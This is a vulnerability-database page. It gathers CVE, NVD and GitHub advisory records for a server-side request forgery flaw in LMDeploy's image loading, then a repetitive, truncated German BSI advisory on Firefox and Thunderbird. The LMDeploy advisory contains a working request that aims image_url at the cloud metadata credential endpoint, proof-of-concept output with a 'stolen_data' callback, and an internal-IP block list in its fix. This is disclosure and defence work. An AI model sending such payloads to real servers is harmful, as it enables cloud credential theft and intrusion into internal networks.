CVE-2026-33626 (GCVE-0-2026-33626)
Vulnerability from cvelistv5 – Published: 2026-04-20 20:29 – Updated: 2026-04-21 19:50
Title
LMDeploy Vulnerable to Server-Side Request Forgery (SSRF) via Vision-Language Image Loading
Summary
LMDeploy is a toolkit for compressing, deploying, and serving large language models. Versions prior to 0.12.3 have a Server-Side Request Forgery (SSRF) vulnerability in LMDeploy's vision-language module. The `load_image()` function in `lmdeploy/vl/utils.py` fetches arbitrary URLs without validating internal/private IP addresses, allowing attackers to access cloud metadata services, internal networks, and sensitive resources. Version 0.12.3 patches the issue.
Severity ?
7.5 (High)
CWE
- CWE-918 - Server-Side Request Forgery (SSRF)
Assigner
References
4 references
| URL | Tags |
|---|---|
| https://github.com/InternLM/lmdeploy/security/adv… | x_refsource_CONFIRM |
| https://github.com/InternLM/lmdeploy/pull/4447 | x_refsource_MISC |
| https://github.com/InternLM/lmdeploy/commit/71d64… | x_refsource_MISC |
| https://github.com/InternLM/lmdeploy/releases/tag… | x_refsource_MISC |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-33626",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-04-21T17:52:10.383689Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-04-21T19:50:13.326Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/InternLM/lmdeploy/security/advisories/GHSA-6w67-hwm5-92mq"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "lmdeploy",
"vendor": "InternLM",
"versions": [
{
"status": "affected",
"version": "\u003c 0.12.3"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "LMDeploy is a toolkit for compressing, deploying, and serving large language models. Versions prior to 0.12.3 have a Server-Side Request Forgery (SSRF) vulnerability in LMDeploy\u0027s vision-language module. The `load_image()` function in `lmdeploy/vl/utils.py` fetches arbitrary URLs without validating internal/private IP addresses, allowing attackers to access cloud metadata services, internal networks, and sensitive resources. Version 0.12.3 patches the issue."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-918",
"description": "CWE-918: Server-Side Request Forgery (SSRF)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-04-20T20:29:19.558Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/InternLM/lmdeploy/security/advisories/GHSA-6w67-hwm5-92mq",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/InternLM/lmdeploy/security/advisories/GHSA-6w67-hwm5-92mq"
},
{
"name": "https://github.com/InternLM/lmdeploy/pull/4447",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/InternLM/lmdeploy/pull/4447"
},
{
"name": "https://github.com/InternLM/lmdeploy/commit/71d64a339edb901e9005358e0633fbbab367d626",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/InternLM/lmdeploy/commit/71d64a339edb901e9005358e0633fbbab367d626"
},
{
"name": "https://github.com/InternLM/lmdeploy/releases/tag/v0.12.3",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/InternLM/lmdeploy/releases/tag/v0.12.3"
}
],
"source": {
"advisory": "GHSA-6w67-hwm5-92mq",
"discovery": "UNKNOWN"
},
"title": "LMDeploy Vulnerable to Server-Side Request Forgery (SSRF) via Vision-Language Image Loading"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-33626",
"datePublished": "2026-04-20T20:29:19.558Z",
"dateReserved": "2026-03-23T14:24:11.617Z",
"dateUpdated": "2026-04-21T19:50:13.326Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2026-33626",
"date": "2026-05-19",
"epss": "0.02924",
"percentile": "0.86562"
}
}
}
FKIE_CVE-2026-33626
Vulnerability from fkie_nvd - Published: 2026-04-20 21:16 - Updated: 2026-04-23 13:39
Severity ?
Summary
LMDeploy is a toolkit for compressing, deploying, and serving large language models. Versions prior to 0.12.3 have a Server-Side Request Forgery (SSRF) vulnerability in LMDeploy's vision-language module. The `load_image()` function in `lmdeploy/vl/utils.py` fetches arbitrary URLs without validating internal/private IP addresses, allowing attackers to access cloud metadata services, internal networks, and sensitive resources. Version 0.12.3 patches the issue.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:internlm:lmdeploy:*:*:*:*:*:*:*:*",
"matchCriteriaId": "208E5C1B-F678-46DA-8CF2-34C2525BF666",
"versionEndExcluding": "0.12.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "LMDeploy is a toolkit for compressing, deploying, and serving large language models. Versions prior to 0.12.3 have a Server-Side Request Forgery (SSRF) vulnerability in LMDeploy\u0027s vision-language module. The `load_image()` function in `lmdeploy/vl/utils.py` fetches arbitrary URLs without validating internal/private IP addresses, allowing attackers to access cloud metadata services, internal networks, and sensitive resources. Version 0.12.3 patches the issue."
}
],
"id": "CVE-2026-33626",
"lastModified": "2026-04-23T13:39:54.420",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2026-04-20T21:16:35.097",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/InternLM/lmdeploy/commit/71d64a339edb901e9005358e0633fbbab367d626"
},
{
"source": "security-advisories@github.com",
"tags": [
"Issue Tracking",
"Patch"
],
"url": "https://github.com/InternLM/lmdeploy/pull/4447"
},
{
"source": "security-advisories@github.com",
"tags": [
"Release Notes"
],
"url": "https://github.com/InternLM/lmdeploy/releases/tag/v0.12.3"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Mitigation",
"Vendor Advisory"
],
"url": "https://github.com/InternLM/lmdeploy/security/advisories/GHSA-6w67-hwm5-92mq"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"tags": [
"Exploit",
"Mitigation",
"Vendor Advisory"
],
"url": "https://github.com/InternLM/lmdeploy/security/advisories/GHSA-6w67-hwm5-92mq"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-918"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
GHSA-6W67-HWM5-92MQ
Vulnerability from github – Published: 2026-04-21 15:04 – Updated: 2026-04-21 15:04
Summary
LMDeploy has Server-Side Request Forgery (SSRF) via Vision-Language Image Loading
Details
Summary
A Server-Side Request Forgery (SSRF) vulnerability exists in LMDeploy's vision-language module. The load_image() function in lmdeploy/vl/utils.py fetches arbitrary URLs without validating internal/private IP addresses, allowing attackers to access cloud metadata services, internal networks, and sensitive resources.
Affected Versions
- Tested on: main branch (2026-02-04)
- Affected: All versions prior to 0.12.3
Vulnerable Code
File: `lmdeploy/vl/utils.py` (lines 64-67)

```python
def load_image(image_url: Union[str, Image.Image]) -> Image.Image:
    # ...
    if image_url.startswith('http'):
        response = requests.get(image_url, headers=headers, timeout=FETCH_TIMEOUT)
        # NO VALIDATION OF URL/IP BEFORE REQUEST
```

Also affected: `encode_image_base64()` function (lines 26-29)
Root Cause
1. No validation of URLs before fetching
2. No blocklist for internal IPs (127.0.0.1, 169.254.x.x, 10.x.x.x, 192.168.x.x)
3. Server binds to `0.0.0.0` by default (api_server.py line 1393)
4. API keys disabled by default
Attack Scenario
1. LMDeploy server deployed with vision-language model
2. Attacker sends request to `/v1/chat/completions` with malicious `image_url`:

```
POST /v1/chat/completions
{
  "model": "internlm-xcomposer2",
  "messages": [{
    "role": "user",
    "content": [
      {"type": "text", "text": "Describe this image"},
      {"type": "image_url", "image_url": {"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"}}
    ]
  }]
}
```

3. Server fetches URL without validation
4. Attacker receives cloud credentials
Proof of Concept
Verified Exploitation Result
```
╔═══════════════════════════════════════════════════════════════════════╗
║ LMDeploy SSRF Vulnerability - Proof of Concept ║
╚═══════════════════════════════════════════════════════════════════════╝

[1] Starting callback server on port 8889...
[2] Attacker URL: http://127.0.0.1:8889/SSRF_PROOF?stolen_data=AWS_SECRET_KEY
[3] Calling vulnerable load_image() function...

======================================================================
[+] SSRF CALLBACK RECEIVED!
======================================================================
  Time: 2026-02-04 16:10:57
  Path: /SSRF_PROOF?stolen_data=AWS_SECRET_KEY
  Client: 127.0.0.1:51154
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)...
======================================================================

✅ SSRF VULNERABILITY CONFIRMED!
```
Impact
- Cloud Credential Theft: Access AWS/GCP/Azure metadata APIs
- Internal Service Access: Reach services not exposed to internet
- Information Disclosure: Port scan internal networks
- Lateral Movement: Pivot point for further attacks
Recommended Fix
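```python
from urllib.parse import urlparse
import ipaddress
import socket

# Loopback, RFC 1918 private ranges and link-local (cloud metadata) addresses
BLOCKED_NETWORKS = [
    ipaddress.ip_network('127.0.0.0/8'),
    ipaddress.ip_network('10.0.0.0/8'),
    ipaddress.ip_network('172.16.0.0/12'),
    ipaddress.ip_network('192.168.0.0/16'),
    ipaddress.ip_network('169.254.0.0/16'),
]

def is_safe_url(url: str) -> bool:
    """Return True only for http(s) URLs whose host resolves outside BLOCKED_NETWORKS."""
    try:
        parsed = urlparse(url)
        if parsed.scheme not in ('http', 'https'):
            return False
        # gethostbyname() returns a single IPv4 address for the host
        ip = socket.gethostbyname(parsed.hostname)
        ip_addr = ipaddress.ip_address(ip)
        return not any(ip_addr in network for network in BLOCKED_NETWORKS)
    except Exception:
        # Fail closed on parse or resolution errors
        return False
```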
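A stricter variant of the check above, as an added example (not code from the advisory or from LMDeploy's 0.12.3 patch): it goes beyond the snippet by checking every resolved address, IPv6 included, and by returning the address the fetch should be pinned to. `UnsafeURL`, `pin_destination`, `is_fetchable` and the `SAMPLE_DNS` table are hypothetical names, and the DNS data is constructed so the block runs offline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit


class UnsafeURL(ValueError):
    """Raised when the server must not fetch a URL."""


def system_resolver(host, port):
    """Return every address (IPv4 and IPv6) the system resolver gives for host."""
    infos = socket.getaddrinfo(host, port, type=socket.SOCK_STREAM)
    return [info[4][0] for info in infos]


def is_public_ip(addr):
    """True only for globally routable unicast addresses."""
    ip = ipaddress.ip_address(addr.split("%")[0])  # drop any IPv6 zone id
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # judge ::ffff:a.b.c.d by its embedded IPv4 address
    return ip.is_global and not ip.is_multicast


def pin_destination(url, resolver=system_resolver):
    """Validate url and return (host, port, ip) for the caller to connect to.

    Connecting to the returned ip (with Host/SNI set to host) means the address
    that was checked is the address that is fetched, even if DNS changes.
    """
    try:
        parts = urlsplit(url)
        port = parts.port or (443 if parts.scheme == "https" else 80)
    except ValueError as exc:  # malformed authority or port
        raise UnsafeURL(f"malformed URL: {exc}") from exc
    if parts.scheme not in ("http", "https"):
        raise UnsafeURL(f"scheme not allowed: {parts.scheme!r}")
    host = parts.hostname
    if not host:
        raise UnsafeURL("URL has no host")
    try:
        addresses = resolver(host, port)
    except OSError as exc:  # socket.gaierror is a subclass of OSError
        raise UnsafeURL(f"cannot resolve {host!r}") from exc
    if not addresses:
        raise UnsafeURL(f"no addresses for {host!r}")
    for addr in addresses:
        # One internal record is enough to reject the whole host.
        if not is_public_ip(addr):
            raise UnsafeURL(f"{host!r} resolves to non-public address {addr}")
    return host, port, addresses[0]


def is_fetchable(url, resolver=system_resolver):
    """Boolean wrapper that fails closed on any validation error."""
    try:
        pin_destination(url, resolver)
        return True
    except ValueError:  # includes UnsafeURL
        return False


# Constructed sample DNS data (not real records) so the example runs offline.
SAMPLE_DNS = {
    "images.example.test": ["93.184.216.34"],
    "metadata.example.test": ["169.254.169.254"],
    "mixed.example.test": ["93.184.216.34", "10.0.0.5"],
    "v6.example.test": ["::ffff:127.0.0.1"],
}


def sample_resolver(host, port):
    """Stand-in resolver: table lookup, and IP literals resolve to themselves."""
    if host in SAMPLE_DNS:
        return SAMPLE_DNS[host]
    try:
        ipaddress.ip_address(host)
        return [host]
    except ValueError:
        raise socket.gaierror("constructed resolver: unknown host") from None


if __name__ == "__main__":
    for u in (
        "https://images.example.test/cat.png",
        "http://169.254.169.254/latest/meta-data/",
        "http://mixed.example.test/a.png",
        "http://[::1]:8889/x",
        "http://v6.example.test/",
    ):
        print(f"{u:45} fetchable={is_fetchable(u, sample_resolver)}")
```

The check only holds if the fetch connects to the returned address and does not follow redirects on its own (for `requests`, `allow_redirects=False`); each `Location` target has to go through `pin_destination` again.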
Credit
This vulnerability was discovered as part of Orca Security's research.
Researcher: Igor Stepansky
Organization: Orca Security
Emails:
igor.stepansky@orca.security
iggy.p0pi@orca.security
Severity ?
7.5 (High)
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "lmdeploy"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "0.12.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33626"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-21T15:04:13Z",
"nvd_published_at": "2026-04-20T21:16:35Z",
"severity": "HIGH"
},
"id": "GHSA-6w67-hwm5-92mq",
"modified": "2026-04-21T15:04:13Z",
"published": "2026-04-21T15:04:13Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/InternLM/lmdeploy/security/advisories/GHSA-6w67-hwm5-92mq"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33626"
},
{
"type": "WEB",
"url": "https://github.com/InternLM/lmdeploy/pull/4447"
},
{
"type": "WEB",
"url": "https://github.com/InternLM/lmdeploy/commit/71d64a339edb901e9005358e0633fbbab367d626"
},
{
"type": "PACKAGE",
"url": "https://github.com/InternLM/lmdeploy"
},
{
"type": "WEB",
"url": "https://github.com/InternLM/lmdeploy/releases/tag/v0.12.3"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "LMDeploy has Server-Side Request Forgery (SSRF) via Vision-Language Image Loading"
}
WID-SEC-W-2026-1228
Vulnerability from csaf_certbund - Published: 2026-04-21 22:00 - Updated: 2026-04-26 22:00
Summary
Mozilla Thunderbird, Firefox ESR and Firefox: Multiple vulnerabilities
Severity
High
Notes
The BSI, as a provider, is responsible under general law for its own content made available for use. Users, however, are responsible for carefully checking, in each individual case, the use and/or implementation of the information provided with the content.
Product description: Thunderbird is an open source e-mail client.
Firefox is an open source web browser.
Attack: An attacker can exploit multiple vulnerabilities in Mozilla Thunderbird, Mozilla Firefox ESR and Mozilla Firefox to escalate privileges, conduct a denial-of-service attack, disclose information, display false information, and bypass security measures.
Affected operating systems:
- Linux
- Other
- UNIX
- Windows
Affected products
Known affected
7 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Mozilla Firefox <150 (Mozilla / Firefox) | | <150 | |
| Mozilla Firefox ESR <140.10 (Mozilla / Firefox ESR) | | <140.10 | |
| Mozilla Firefox ESR <115.35 (Mozilla / Firefox ESR) | | <115.35 | |
| Debian Linux (Debian) | cpe:/o:debian:debian_linux:- | — | |
| Mozilla Thunderbird <140.10 (Mozilla / Thunderbird) | | <140.10 | |
| Mozilla Thunderbird <150 (Mozilla / Thunderbird) | | <150 | |
| SUSE openSUSE (SUSE) | cpe:/o:suse:opensuse:- | — | |
Affected products
Known affected
7 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
7 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
7 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
7 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
7 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
7 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
7 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
7 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
7 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
7 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
7 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
References
13 references
{
"document": {
"aggregate_severity": {
"text": "hoch"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
"text": "Thunderbird ist ein Open Source E-Mail Client.\r\nFirefox ist ein Open Source Web Browser.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein Angreifer kann mehrere Schwachstellen in Mozilla Thunderbird, Mozilla Firefox ESR und Mozilla Firefox ausnutzen, um seine Privilegien zu erh\u00f6hen, um einen Denial of Service Angriff durchzuf\u00fchren, um Informationen offenzulegen, um falsche Informationen darzustellen, und um Sicherheitsvorkehrungen zu umgehen.",
"title": "Angriff"
},
{
"category": "general",
"text": "- Linux\n- Sonstiges\n- UNIX\n- Windows",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
"summary": "WID-SEC-W-2026-1228 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-1228.json"
},
{
"category": "self",
"summary": "WID-SEC-2026-1228 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-1228"
},
{
"category": "external",
"summary": "Mozilla Security Advisory mfsa2026-30 vom 2026-04-21",
"url": "https://www.mozilla.org/en-US/security/advisories/mfsa2026-30/"
},
{
"category": "external",
"summary": "Mozilla Security Advisory mfsa2026-31 vom 2026-04-21",
"url": "https://www.mozilla.org/en-US/security/advisories/mfsa2026-31/"
},
{
"category": "external",
"summary": "Mozilla Security Advisory mfsa2026-32 vom 2026-04-21",
"url": "https://www.mozilla.org/en-US/security/advisories/mfsa2026-32"
},
{
"category": "external",
"summary": "Mozilla Security Advisory mfsa2026-33 vom 2026-04-21",
"url": "https://www.mozilla.org/en-US/security/advisories/mfsa2026-33/"
},
{
"category": "external",
"summary": "Mozilla Security Advisory mfsa2026-34 vom 2026-04-21",
"url": "https://www.mozilla.org/en-US/security/advisories/mfsa2026-34/"
},
{
"category": "external",
"summary": "Debian Security Advisory DLA-4546 vom 2026-04-23",
"url": "https://lists.debian.org/debian-lts-announce/2026/04/msg00027.html"
},
{
"category": "external",
"summary": "National Vulnerability Database CVE-2026-6748 vom 2026-04-22",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6748"
},
{
"category": "external",
"summary": "National Vulnerability Database CVE-2026-6750 vom 2026-04-22",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6750"
},
{
"category": "external",
"summary": "openSUSE Security Update OPENSUSE-SU-2026:10610-1 vom 2026-04-25",
"url": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/6VX2E6MLQKO7DPWQ4ZZHUP2YTTOARCJ2/"
},
{
"category": "external",
"summary": "Debian Security Advisory DSA-6229 vom 2026-04-24",
"url": "https://security-tracker.debian.org/tracker/DSA-6229-1"
},
{
"category": "external",
"summary": "Debian Security Advisory DLA-4549 vom 2026-04-26",
"url": "https://lists.debian.org/debian-lts-announce/2026/04/msg00030.html"
}
],
"source_lang": "en-US",
"title": "Mozilla Thunderbird, Firefox ESR und Firefox: Mehrere Schwachstellen",
"tracking": {
"current_release_date": "2026-04-26T22:00:00.000+00:00",
"generator": {
"date": "2026-04-27T08:44:16.530+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.5.0"
}
},
"id": "WID-SEC-W-2026-1228",
"initial_release_date": "2026-04-21T22:00:00.000+00:00",
"revision_history": [
{
"date": "2026-04-21T22:00:00.000+00:00",
"number": "1",
"summary": "Initiale Fassung"
},
{
"date": "2026-04-22T22:00:00.000+00:00",
"number": "2",
"summary": "Neue Updates von Debian aufgenommen"
},
{
"date": "2026-04-23T22:00:00.000+00:00",
"number": "3",
"summary": "Anpassung CVSS Bewertung gem\u00e4\u00df NVD Angaben"
},
{
"date": "2026-04-26T22:00:00.000+00:00",
"number": "4",
"summary": "Neue Updates von openSUSE und Debian aufgenommen"
}
],
"status": "final",
"version": "4"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Debian Linux",
"product": {
"name": "Debian Linux",
"product_id": "2951",
"product_identification_helper": {
"cpe": "cpe:/o:debian:debian_linux:-"
}
}
}
],
"category": "vendor",
"name": "Debian"
},
{
"branches": [
{
"branches": [
{
"category": "product_version_range",
"name": "\u003c150",
"product": {
"name": "Mozilla Firefox \u003c150",
"product_id": "T053198"
}
},
{
"category": "product_version",
"name": "150",
"product": {
"name": "Mozilla Firefox 150",
"product_id": "T053198-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:mozilla:firefox:150"
}
}
}
],
"category": "product_name",
"name": "Firefox"
},
{
"branches": [
{
"category": "product_version_range",
"name": "\u003c140.10",
"product": {
"name": "Mozilla Firefox ESR \u003c140.10",
"product_id": "T053196"
}
},
{
"category": "product_version",
"name": "140.1",
"product": {
"name": "Mozilla Firefox ESR 140.10",
"product_id": "T053196-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:mozilla:firefox_esr:140.10"
}
}
},
{
"category": "product_version_range",
